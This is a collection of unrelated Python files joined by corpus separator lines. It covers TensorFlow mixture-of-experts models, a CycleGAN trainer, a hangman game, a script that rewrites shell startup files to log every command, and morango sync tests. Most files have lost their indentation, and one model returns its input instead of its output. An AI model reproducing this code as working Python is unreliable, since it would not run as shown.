l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
num_extends = FLAGS.moe_num_extend
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
extend_activations = slim.fully_connected(
model_input,
vocab_size,
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="extends")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
extend_distribution = tf.nn.softmax(tf.reshape(
extend_activations,
[-1, num_extends, vocab_size]),dim=1) # Batch x num_extends x vocab_size, normalized over segments
final_probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_probabilities = tf.reduce_sum(tf.reshape(final_probabilities_by_class_and_batch,
[-1, num_extends, vocab_size])*extend_distribution,axis=1)
return {"predictions": final_probabilities}
class MoeSepModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
feature_sizes = FLAGS.feature_sizes
feature_sizes = [int(feature_size) for feature_size in feature_sizes.split(',')]
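# One independent MoE per feature group, with group sizes taken from
# FLAGS.feature_sizes (e.g. "1024,128" for video and audio features); the
# per-group predictions are fused with an elementwise maximum below.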
fbegin = 0
final_probabilities_all = []
for i in range(len(feature_sizes)):
feature_size = feature_sizes[i]
feature_input = model_input[:,fbegin:fbegin+feature_size]
fbegin += feature_size
gate = slim.fully_connected(
feature_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates-%s" % i)
expert = slim.fully_connected(
feature_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts-%s" % i)
gating_distribution = tf.nn.softmax(tf.reshape(
gate,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
final_prob = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
final_prob = tf.reshape(final_prob,[-1, vocab_size])
final_probabilities_all.append(final_prob)
final_probabilities_all = tf.stack(final_probabilities_all,axis=1)
final_probabilities = tf.reduce_max(final_probabilities_all,axis=1)
return {"predictions": final_probabilities}
class SimModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
embedding_size = model_input.get_shape().as_list()[1]
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
model_input = tf.maximum(model_input,tf.zeros_like(model_input))
expert_distribution = []
for i in range(num_mixtures):
embeddings = tf.Variable(tf.truncated_normal([vocab_size, embedding_size],stddev=0.1))
tf.add_to_collection(name=tf.GraphKeys.REGULARIZATION_LOSSES, value=l2_penalty*tf.nn.l2_loss(embeddings))
embeddings = tf.maximum(embeddings,tf.zeros_like(embeddings))
norm_embeddings = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))
normalized_embeddings = tf.div(embeddings, norm_embeddings)
norm_input = tf.sqrt(tf.reduce_sum(tf.square(model_input), 1, keep_dims=True))
normalized_input = tf.div(model_input,norm_input)
similarity = tf.matmul(normalized_input, normalized_embeddings, transpose_b=True)*2
expert_distribution.append(similarity)
expert_distribution = tf.stack(expert_distribution,axis=2)
expert_distribution = tf.reshape(expert_distribution,[-1,num_mixtures])
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
    final_probabilities = tf.reshape(probabilities_by_class_and_batch,
                                     [-1, vocab_size])
return {"predictions": final_probabilities}
class AutoEncoderModel(models.BaseModel):
"""Logistic model with L2 regularization."""
def create_model(self, model_input, vocab_size, l2_penalty=1e-8, **unused_params):
"""Creates a logistic model.
Args:
model_input: 'batch' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes."""
hidden_size_1 = FLAGS.hidden_size_1
hidden_size_2 = FLAGS.encoder_size
with tf.name_scope("autoencoder"):
hidden_1 = slim.fully_connected(
model_input,
hidden_size_1,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="hidden_1")
hidden_2 = slim.fully_connected(
hidden_1,
hidden_size_2,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="hidden_2")
output_1 = slim.fully_connected(
hidden_2,
hidden_size_1,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="output_1")
output_2 = slim.fully_connected(
output_1,
vocab_size,
activation_fn=tf.nn.sigmoid,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="output_2")
"""
scale = tf.get_variable("scale", [1, vocab_size], tf.float32,
initializer=tf.constant_initializer(0.0))
tf.add_to_collection(name=tf.GraphKeys.REGULARIZATION_LOSSES, value=l2_penalty*tf.nn.l2_loss(scale))"""
output_2 = model_input
return {"predictions": output_2}
|
nilq/baby-python
|
python
|
import csv

from table import Table
class CSVTable(Table):
def __init__(self, savepath):
self.savepath = savepath
self.file_created = False
super().__init__()
def _table_add(self):
fieldnames = [column.generate_header() for column in self.columns]
with open(self.savepath, mode="w") as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writeheader()
def _tablesave(self):
fieldnames = [column.generate_header() for column in self.columns]
values = {column.generate_header(): column.get_last_value() for column in self.columns}
with open(self.savepath, mode="a") as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
writer.writerow(values)
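
# Hypothetical usage sketch (assumed, since the Table base class and its
# column API are not shown in this file): _table_add() presumably runs once
# to write the CSV header, and _tablesave() appends one row holding the
# latest value of every column, e.g.
#
#     table = CSVTable("results.csv")
#     table._table_add()
#     table._tablesave()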
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
import csv
from pathlib import Path
import tkinter as tk
import argparse
import json
def matchKeyToName(pathToJsonfile: str, key: str):
    with open(pathToJsonfile) as jsonFile:
        cityKeysFile = json.load(jsonFile)
    return cityKeysFile[key]['Town']
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--classifType', type=str, required=False, default='Tiles')
parser.add_argument('--datasetPath', type=str, required=False, default='C:/Users/hx21262/MAPHIS/datasets')
parser.add_argument('--cityKey', type=str, required=False, default='36')
args = parser.parse_args()
cityName = matchKeyToName(f'{args.datasetPath}/cityKey.json', args.cityKey)
datasetPath = Path(args.datasetPath)
classifiedFolderPath = Path(f'{args.datasetPath}/classifiedMaps/{cityName}')
classifiedFolderPath.mkdir(parents=True, exist_ok=True)
print(f'Classification Type : {args.classifType}')
if args.classifType.lower() == 'labels':
        defaultFeatureList = ['manhole', 'lamppost', 'stone', 'chimney', 'chy', 'hotel',
                              'church', 'workshop', 'firepost', 'river', 'school', 'barrack',
                              'workhouse', 'market', 'chapel', 'bank', 'pub', 'public house',
                              'inn', 'bath', 'theatre', 'police', 'wharf', 'yard', 'green', 'park', 'quarry']
from interactiveWindowLabels import Application
elif args.classifType.lower() == 'tiles':
defaultFeatureList = ['rich residential neighborhood', 'poor residential neighborhood', 'industrial district',
'peri-urban district', 'farm and forest']
from interactiveWindowTiles import Application
elif args.classifType.lower() == 'contours':
defaultFeatureList = ['interesting','not interesting', 'tree', 'factory', 'villa']
from interactiveWindowContours import Application
else:
raise ValueError ("Has to be contours, tiles or labels")
featureListName = f'featureList{args.classifType.capitalize()}.csv'
## Check if feature List file exists, creates it if not
fp = Path(f'{args.datasetPath}/classifiedMaps/{featureListName}')
if not fp.is_file():
with open(fp, 'w', newline='') as csvFile:
fileWriter = csv.writer(csvFile)
for featureName in defaultFeatureList:
fileWriter.writerow([featureName])
root = tk.Tk()
app = Application(root, cityName, datasetPath, classifiedFolderPath)
root.mainloop()
if __name__=='__main__':
main()
|
nilq/baby-python
|
python
|
"""Events that are emitted during pipeline execution"""
import abc
import datetime
import json
import enum
class Event():
def __init__(self) -> None:
"""
Base class for events that are emitted from mara.
"""
def to_json(self):
return json.dumps({field: value.isoformat() if isinstance(value, datetime.datetime) else value
for field, value in self.__dict__.items()})
class EventHandler(abc.ABC):
@abc.abstractmethod
def handle_event(self, event: Event):
pass
class PipelineEvent(Event):
def __init__(self, node_path: [str]) -> None:
"""
Base class for events that are emitted during a pipeline run.
Args:
node_path: The path of the current node in the data pipeline that is run
"""
        self.node_path = node_path
class RunStarted(PipelineEvent):
def __init__(self, node_path: [str], start_time: datetime.datetime, pid: int) -> None:
"""
A pipeline run started
Args:
node_path: The path of the pipeline that was run
start_time: The time when the run started
pid: The process id of the process that runs the pipeline
"""
super().__init__([])
self.node_path = node_path
self.start_time = start_time
self.pid = pid
class RunFinished(PipelineEvent):
def __init__(self, node_path: [str], end_time: datetime.datetime, succeeded: bool) -> None:
"""
A pipeline run finished
Args:
node_path: The path of the pipeline that was run
end_time: The time when the run finished
succeeded: Whether the run succeeded
"""
super().__init__([])
self.node_path = node_path
self.end_time = end_time
self.succeeded = succeeded
class NodeStarted(PipelineEvent):
def __init__(self, node_path: [str], start_time: datetime.datetime, is_pipeline: bool) -> None:
"""
A task run started.
Args:
node_path: The path of the current node in the data pipeline that is run
start_time: The time when the task started
is_pipeline: Whether the node is a pipeline
"""
super().__init__(node_path)
self.start_time = start_time
self.is_pipeline = is_pipeline
class NodeFinished(PipelineEvent):
def __init__(self, node_path: [str], start_time: datetime.datetime, end_time: datetime.datetime,
is_pipeline: bool, succeeded: bool) -> None:
"""
A run of a task or pipeline finished.
Args:
node_path: The path of the current node in the data pipeline that is run
start_time: The time when the task started
end_time: The time when the task finished
is_pipeline: Whether the node is a pipeline
succeeded: Whether the task succeeded
"""
super().__init__(node_path)
self.start_time = start_time
self.end_time = end_time
self.is_pipeline = is_pipeline
self.succeeded = succeeded
class Output(PipelineEvent):
    class Format(enum.Enum):
"""Formats for displaying log messages"""
STANDARD = 'standard'
VERBATIM = 'verbatim'
ITALICS = 'italics'
def __init__(self, node_path: [str], message: str,
format: Format = Format.STANDARD, is_error: bool = False) -> None:
"""
Some text output occurred.
Args:
node_path: The path of the current node in the data pipeline that is run
message: The message to display
format: How to format the message
is_error: Whether the message is considered an error message
"""
super().__init__(node_path)
self.message = message
self.format = format
self.is_error = is_error
self.timestamp = datetime.datetime.now()
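
# Minimal example handler (added for illustration, using only the classes
# defined above): prints every event it receives as JSON.
class PrintingEventHandler(EventHandler):
    def handle_event(self, event: Event):
        print(event.to_json())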
|
nilq/baby-python
|
python
|
# An implementation of reference learning for the game TicTacToe
|
nilq/baby-python
|
python
|
from enum import Enum
import numpy as np
class TypeData(Enum):
BODY = 0
HAND = 1
class HandJointType(Enum):
BAMB_0 = 0
BAMB_1 = 1
BIG_TOE = 2
BIG_TOE_1 = 3
BIG_TOE_2 = 4
FINGER_1 = 5
FINGER_1_1 = 6
FINGER_1_2 = 7
FINGER_1_3 = 8
FINGER_2 = 9
FINGER_2_1 = 10
FINGER_2_2 = 11
FINGER_2_3 = 12
FINGER_3 = 13
FINGER_3_1 = 14
FINGER_3_2 = 15
FINGER_3_3 = 16
FINGER_4 = 17
FINGER_4_1 = 18
FINGER_4_2 = 19
FINGER_4_3 = 20
class JointType(Enum):
Nose = 0
Neck = 1
RightShoulder = 2
RightElbow = 3
RightHand = 4
LeftShoulder = 5
LeftElbow = 6
LeftHand = 7
RightWaist = 8
RightKnee = 9
RightFoot = 10
LeftWaist = 11
LeftKnee = 12
LeftFoot = 13
RightEye = 14
LeftEye = 15
RightEar = 16
LeftEar = 17
hand_join_indices = [
HandJointType.BAMB_0,
HandJointType.BAMB_1,
HandJointType.BIG_TOE,
HandJointType.BIG_TOE_1,
HandJointType.BIG_TOE_2,
HandJointType.FINGER_1,
HandJointType.FINGER_1_1,
HandJointType.FINGER_1_2,
HandJointType.FINGER_1_3,
HandJointType.FINGER_2,
HandJointType.FINGER_2_1,
HandJointType.FINGER_2_2,
HandJointType.FINGER_2_3,
HandJointType.FINGER_3,
HandJointType.FINGER_3_1,
HandJointType.FINGER_3_2,
HandJointType.FINGER_3_3,
HandJointType.FINGER_4,
HandJointType.FINGER_4_1,
HandJointType.FINGER_4_2,
HandJointType.FINGER_4_3
]
coco_joint_indices= [
JointType.Nose,
JointType.LeftEye,
JointType.RightEye,
JointType.LeftEar,
JointType.RightEar,
JointType.LeftShoulder,
JointType.RightShoulder,
JointType.LeftElbow,
JointType.RightElbow,
JointType.LeftHand,
JointType.RightHand,
JointType.LeftWaist,
JointType.RightWaist,
JointType.LeftKnee,
JointType.RightKnee,
JointType.LeftFoot,
JointType.RightFoot
]
LIMBS = [[JointType.Neck, JointType.RightWaist],
[JointType.RightWaist, JointType.RightKnee],
[JointType.RightKnee, JointType.RightFoot],
[JointType.Neck, JointType.LeftWaist],
[JointType.LeftWaist, JointType.LeftKnee],
[JointType.LeftKnee, JointType.LeftFoot],
[JointType.Neck, JointType.RightShoulder],
[JointType.RightShoulder, JointType.RightElbow],
[JointType.RightElbow, JointType.RightHand],
[JointType.RightShoulder, JointType.RightEar],
[JointType.Neck, JointType.LeftShoulder],
[JointType.LeftShoulder, JointType.LeftElbow],
[JointType.LeftElbow, JointType.LeftHand],
[JointType.LeftShoulder, JointType.LeftEar],
[JointType.Neck, JointType.Nose],
[JointType.Nose, JointType.RightEye],
[JointType.Nose, JointType.LeftEye],
[JointType.RightEye, JointType.RightEar],
[JointType.LeftEye, JointType.LeftEar]]
HANDLINES = [
[HandJointType.BAMB_0, HandJointType.BAMB_1],
[HandJointType.BAMB_1, HandJointType.BIG_TOE],
[HandJointType.BIG_TOE, HandJointType.BIG_TOE_1],
[HandJointType.BIG_TOE_1, HandJointType.BIG_TOE_2],
[HandJointType.BAMB_0, HandJointType.FINGER_1],
[HandJointType.FINGER_1, HandJointType.FINGER_1_1],
[HandJointType.FINGER_1_1, HandJointType.FINGER_1_2],
[HandJointType.FINGER_1_2, HandJointType.FINGER_1_3],
[HandJointType.BAMB_0, HandJointType.FINGER_2],
[HandJointType.FINGER_2, HandJointType.FINGER_2_1],
[HandJointType.FINGER_2_1, HandJointType.FINGER_2_2],
[HandJointType.FINGER_2_2, HandJointType.FINGER_2_3],
[HandJointType.BAMB_0, HandJointType.FINGER_3],
[HandJointType.FINGER_3, HandJointType.FINGER_3_1],
[HandJointType.FINGER_3_1, HandJointType.FINGER_3_2],
[HandJointType.FINGER_3_2, HandJointType.FINGER_3_3],
[HandJointType.BAMB_0, HandJointType.FINGER_4],
[HandJointType.FINGER_4, HandJointType.FINGER_4_1],
[HandJointType.FINGER_4_1, HandJointType.FINGER_4_2],
[HandJointType.FINGER_4_2, HandJointType.FINGER_4_3],
]
body_edges = np.array(
[[0, 1], # neck - nose
[1, 16], [16, 18], # nose - l_eye - l_ear
[1, 15], [15, 17], # nose - r_eye - r_ear
[0, 3], [3, 4], [4, 5], # neck - l_shoulder - l_elbow - l_wrist
[0, 9], [9, 10], [10, 11], # neck - r_shoulder - r_elbow - r_wrist
[0, 6], [6, 7], [7, 8], # neck - l_hip - l_knee - l_ankle
[0, 12], [12, 13], [13, 14]]) # neck - r_hip - r_knee - r_ankle
hand_edges = [[0, 1],
              [1, 2], [2, 3], [3, 4],                # wrist - thumb chain
              [0, 5], [5, 6], [6, 7], [7, 8],        # wrist - index finger chain
              [0, 9], [9, 10], [10, 11], [11, 12],   # wrist - middle finger chain
              [0, 13], [13, 14], [14, 15], [15, 16], # wrist - ring finger chain
              [0, 17], [17, 18], [18, 19], [19, 20]] # wrist - little finger chain
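
# Example (added for illustration): drawing code usually needs plain integer
# index pairs rather than enum members; Enum.value converts them.
limb_index_pairs = [[a.value, b.value] for a, b in LIMBS]
handline_index_pairs = [[a.value, b.value] for a, b in HANDLINES]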
|
nilq/baby-python
|
python
|
import tensorflow as tf
import time
import os
import sys
import model_nature as model
base = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(base,'../../'))
import datasets.Img2ImgPipeLine as train_dataset
physical_devices = tf.config.experimental.list_physical_devices(device_type='GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], True)
from tensorflow.keras.mixed_precision import experimental as mixed_precision
policy = mixed_precision.Policy('mixed_float16')
mixed_precision.set_policy(policy)
######################################################################################################
train_path_A = "G:\\Datasets\\Img2Img\\horse2zebra\\trainA"
train_path_B = "G:\\Datasets\\Img2Img\\horse2zebra\\trainB"
test_path_A = "G:\\Datasets\\Img2Img\\horse2zebra\\testA"
test_path_B = "G:\\Datasets\\Img2Img\\horse2zebra\\testB"
tmp_path = "D:/Work/Codes_tmp/2DCycleGAN-mixed-horse2zebra-Vanilla"
out_path = "D:/Work/Codes_tmp/2DCycleGAN-mixed-horse2zebra-Vanilla/out"
if not os.path.exists(tmp_path):
os.makedirs(tmp_path)
if not os.path.exists(out_path):
os.makedirs(out_path)
def map_func(x):
# x shape = [batch,2,256,256,3]
    # Normalization is required to match the network's tanh output, but it is
    # not yet clear which pixel statistics to normalize with; it may be
    # necessary to scan all values first.
A = tf.reshape(x[:,0,:,:,:],[1,256,256,3], name=None)
A = (A-0.0)/1
B = tf.reshape(x[:,1,:,:,:],[1,256,256,3], name=None)
B = (B-0.0)/1
return A,B
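
# Illustrative note (not from the original author): for 8-bit image tensors a
# common choice that matches a tanh generator is to map pixels into [-1, 1],
# e.g. A = (A - 127.5) / 127.5, instead of the placeholder (A - 0.0) / 1 above.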
EPOCHES = 200
BATCH_SIZE = 1
num_threads = 4
dataset = train_dataset.DataPipeLine(train_path_A,train_path_B)
dataset = tf.data.Dataset.from_generator(dataset.generator,output_types=tf.float32)\
.batch(BATCH_SIZE)\
.map(map_func,num_parallel_calls=num_threads)\
.prefetch(buffer_size = tf.data.experimental.AUTOTUNE)
test_set = train_dataset.DataPipeLine(test_path_A,test_path_B)
test_set = tf.data.Dataset.from_generator(test_set.generator,output_types=tf.float32)\
.batch(BATCH_SIZE)\
.map(map_func,num_parallel_calls=num_threads)\
.prefetch(buffer_size = tf.data.experimental.AUTOTUNE)
gan = model.CycleGAN(train_set=dataset,
                     test_set=test_set,
                     loss_name="Vanilla",
                     mixed_precision=True,
                     learning_rate=2e-4,
                     tmp_path=tmp_path,
                     out_path=out_path)
gan.build(X_shape=[None,256,256,3], Y_shape=[None,256,256,3])
gan.train(epoches=EPOCHES)
|
nilq/baby-python
|
python
|
#
# Hangman
# Python Techdegree
#
# Created by Dulio Denis on 2/9/17.
# Copyright (c) 2017 ddApps. All rights reserved.
# ------------------------------------------------
# Guess what word the computer picked.
#
import random
import os
import sys
# make a list of words
words = [
'apple',
'banana',
'orange',
'coconut',
'strawberry',
'lime',
'grapefruit',
'lemon',
'kumquat',
'pineapple',
'blueberry',
'melon'
]
# clear the screen
def clear():
# if windows
if os.name == 'nt':
os.system('cls')
# else its Unix based like macOS and Linux
else:
os.system('clear')
# draw function
def draw(bad_guesses, good_guesses, secret_word):
# clear the screen first
clear()
# and draw the strikes
print('Strikes: {}/7'.format(len(bad_guesses)))
print('') # a blank line just for formatting
# draw the bad guesses
for letter in bad_guesses:
        print(letter, end=' ')
print('\n\n')
# then draw guessed letters
for letter in secret_word:
if letter in good_guesses:
print(letter, end=' ')
else:
print('_', end=' ')
# get the guess
def get_guess(bad_guesses, good_guesses):
while True:
# take a guess and lowercase it right away
guess = input("Guess a letter: ").lower()
# validate its a legitimate guess
        if len(guess) != 1:
print("You can only guess a single letter")
elif guess in bad_guesses or guess in good_guesses:
print("You've already guessed that letter.")
elif not guess.isalpha():
print("You can only guess letters.")
else:
return guess
# play the game
def play(done):
# clear the screen
clear()
# pick a random word
secret_word = random.choice(words)
# have both a good and bad guess letter list
bad_guesses = []
good_guesses = []
while True:
draw(bad_guesses, good_guesses, secret_word)
guess = get_guess(bad_guesses, good_guesses)
if guess in secret_word:
good_guesses.append(guess)
found = True
for letter in secret_word:
if letter not in good_guesses:
found = False
if found:
print("You win!")
print("The secret word was {}".format(secret_word))
done = True
else:
bad_guesses.append(guess)
if len(bad_guesses) == 7:
draw(bad_guesses, good_guesses, secret_word)
print("You lost!")
print("The secret word was {}".format(secret_word))
done = True
if done:
play_again = input('Play again? Y/n ').lower()
if play_again != 'n':
return play(done=False)
else:
sys.exit()
def welcome():
print('Welcome to Hangman!')
start = input('Press enter/return to start or Q to quit ').lower()
if start == 'q':
print('Thanks for playing.')
sys.exit()
else:
return True
done = False
while True:
clear()
welcome()
play(done)
|
nilq/baby-python
|
python
|
#!/usr/bin/python3
from shutil import copyfile
from shutil import move
from os import remove
from os import environ
import os
import os.path
import sys
import subprocess
homedir = os.environ['HOME']
bash_target_file = homedir + "/.bashrc"
bash_backup_file = homedir + "/.backup-bashrc"
bash_new_file = homedir + "/.newbashrc"
interfaces = []
def get_network_interfaces():
for line in open('/proc/net/dev', 'r'):
if line.find(":") != -1 and line.find("lo") == -1:
interfaces.append(line.split(":")[0].strip())
def modify_bash_terminal_line(selected_interface):
with open(bash_new_file, "w") as newfile:
with open (bash_target_file) as oldfile:
for line in oldfile:
if line.find("PS1") != -1 and not line.strip().startswith("#"):
### This modifies the terminal to show timestamp, IP, and current directory inline
newfile.write("PS1=\'[`date +\"%d-%b-%y %T\"`]\\[\\033[01;31m\\] `ifconfig " + selected_interface + " 2>/dev/null | sed -n 2,2p | cut -d\" \" -f 10`\\[\\033[00m\\] \\[\\033[01;34m\\]\\W\\[\\033[00m\\] > \'" + "\n")
else:
newfile.write(line)
remove(bash_target_file)
move(bash_new_file, bash_target_file)
def add_log_file_creation():
with open(bash_target_file, "a") as f:
### Add a line to the .bashrc file to create a new log file and log all shell commands
f.write("test \"$(ps -ocommand= -p $PPID | awk \'{print $1}\')\" == \'script\' || (script -f $HOME/$(date +\"%d-%b-%y_%H-%M-%S\")_shell.log)")
def zsh_log_file_creation(user):
zsh_filename = "/" + user + "/.zshrc"
with open(zsh_filename, "a") as file:
file.write("precmd() { eval 'RETRN_VAL=$?;logger -p local6.debug \"$(whoami) [$$]: $(history | tail -n1 | sed \"s/^[ ]*[0-9]\+[ ]*//\" ) [$RETRN_VAL]\"' }")
def main():
if ("zsh" in environ['SHELL']):
with open("/etc/rsyslog.d/commands.conf", "w") as commands:
commands.write("local6.* /var/log/commands.log")
result = subprocess.run(["service", "rsyslog restart"], capture_output=True, text=True)
# Make modifications to .zshrc
if os.path.isfile("/root/.zshrc"):
copyfile("/root/.zshrc", "/root/.backup_zshrc") ### make a back-up just in case :)
zsh_log_file_creation("root")
else:
print("Something's wrong... there's no \".zshrc\" file for root!")
if os.path.isfile("/home/kali/.zshrc"):
copyfile("/home/kali/.zshrc", "/home/kali/.backup_zshrc") ### make a back-up just in case :)
zsh_log_file_creation("home/kali")
else:
print("Something's wrong... there's no \".zshrc\" file for kali!")
else:
if os.path.isfile(bash_target_file):
### Figure out what network interfaces are available
selected_interface = None
get_network_interfaces()
### If there is only one interface, don't bother asking the user - just set that
            if len(interfaces) == 1:
selected_interface = interfaces[0]
else: ### Otherwise, ask the user to select from the available network interfaces
while selected_interface not in interfaces:
                    selected_interface = input("Choose your active interface: " + ' '.join(interfaces) + "\n")
copyfile(bash_target_file, bash_backup_file) ### make a back-up of the .bashrc - just in case :)
modify_bash_terminal_line(selected_interface)
add_log_file_creation()
else:
print("Something's wrong... there's no \".bashrc\" file!")
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
import json
import uuid
import factory
import mock
from django.test import TestCase
from facility_profile.models import Facility
from facility_profile.models import MyUser
from facility_profile.models import SummaryLog
from test.support import EnvironmentVarGuard
from .helpers import serialized_facility_factory
from morango.models.certificates import Filter
from morango.models.core import DeletedModels
from morango.models.core import HardDeletedModels
from morango.models.core import InstanceIDModel
from morango.models.core import RecordMaxCounter
from morango.models.core import Store
from morango.sync.controller import _self_referential_fk
from morango.sync.controller import MorangoProfileController
class FacilityModelFactory(factory.DjangoModelFactory):
class Meta:
model = Facility
name = factory.Sequence(lambda n: "Fac %d" % n)
class StoreModelFacilityFactory(factory.DjangoModelFactory):
class Meta:
model = Store
model_name = "facility"
profile = "facilitydata"
last_saved_instance = uuid.uuid4().hex
last_saved_counter = 1
dirty_bit = True
class SerializeIntoStoreTestCase(TestCase):
def setUp(self):
InstanceIDModel.get_or_create_current_instance()
self.range = 10
self.mc = MorangoProfileController("facilitydata")
self.original_name = "ralphie"
self.new_name = "rafael"
def test_all_models_get_serialized(self):
[FacilityModelFactory() for _ in range(self.range)]
self.mc.serialize_into_store()
self.assertEqual(len(Store.objects.all()), self.range)
def test_no_models_get_serialized(self):
# set dirty bit off on new models created
[
FacilityModelFactory.build().save(update_dirty_bit_to=False)
for _ in range(self.range)
]
# only models with dirty bit on should be serialized
self.mc.serialize_into_store()
self.assertFalse(Store.objects.exists())
def test_dirty_bit_gets_set(self):
[FacilityModelFactory() for _ in range(self.range)]
# dirty bit should be on
for facility in Facility.objects.all():
self.assertTrue(facility._morango_dirty_bit)
self.mc.serialize_into_store()
# dirty bit should have been toggled off
for facility in Facility.objects.all():
self.assertFalse(facility._morango_dirty_bit)
def test_store_models_get_updated(self):
FacilityModelFactory(name=self.original_name)
self.mc.serialize_into_store()
store_facility = Store.objects.first()
deserialized_model = json.loads(store_facility.serialized)
self.assertEqual(deserialized_model["name"], self.original_name)
Facility.objects.update(name=self.new_name)
self.mc.serialize_into_store()
store_facility = Store.objects.first()
deserialized_model = json.loads(store_facility.serialized)
self.assertEqual(deserialized_model["name"], self.new_name)
def test_last_saved_counter_updates(self):
FacilityModelFactory(name=self.original_name)
self.mc.serialize_into_store()
old_counter = Store.objects.first().last_saved_counter
Facility.objects.all().update(name=self.new_name)
self.mc.serialize_into_store()
new_counter = Store.objects.first().last_saved_counter
self.assertEqual(old_counter + 1, new_counter)
def test_last_saved_instance_updates(self):
FacilityModelFactory(name=self.original_name)
self.mc.serialize_into_store()
old_instance_id = Store.objects.first().last_saved_instance
with EnvironmentVarGuard() as env:
env['MORANGO_SYSTEM_ID'] = 'new_sys_id'
(new_id, _) = InstanceIDModel.get_or_create_current_instance(clear_cache=True)
Facility.objects.all().update(name=self.new_name)
self.mc.serialize_into_store()
new_instance_id = Store.objects.first().last_saved_instance
self.assertNotEqual(old_instance_id, new_instance_id)
self.assertEqual(new_instance_id, new_id.id)
def test_extra_fields_dont_get_overwritten(self):
serialized = """{"username": "deadbeef", "height": 6.0, "weight": 100}"""
MyUser.objects.create(username="deadbeef")
self.mc.serialize_into_store()
Store.objects.update(serialized=serialized)
MyUser.objects.update(username="alivebeef")
self.mc.serialize_into_store()
serialized = json.loads(Store.objects.first().serialized)
self.assertIn("height", serialized)
def test_updates_store_deleted_flag(self):
fac = FacilityModelFactory()
fac_id = fac.id
self.mc.serialize_into_store()
self.assertFalse(Store.objects.get(pk=fac_id).deleted)
fac.delete()
self.assertTrue(DeletedModels.objects.exists())
self.mc.serialize_into_store()
self.assertFalse(DeletedModels.objects.exists())
self.assertTrue(Store.objects.get(pk=fac_id).deleted)
def test_cascading_delete_updates_store_deleted_flag(self):
fac = FacilityModelFactory()
child = FacilityModelFactory(parent_id=fac.id)
child_id = child.id
self.mc.serialize_into_store()
self.assertFalse(Store.objects.get(pk=child_id).deleted)
fac.delete()
self.mc.serialize_into_store()
self.assertTrue(Store.objects.get(pk=child_id).deleted)
def test_conflicting_data_appended(self):
self.maxDiff = None
serialized = json.dumps({"username": "deadb\neef"})
conflicting = []
user = MyUser.objects.create(username="user")
self.mc.serialize_into_store()
# add serialized fields to conflicting data
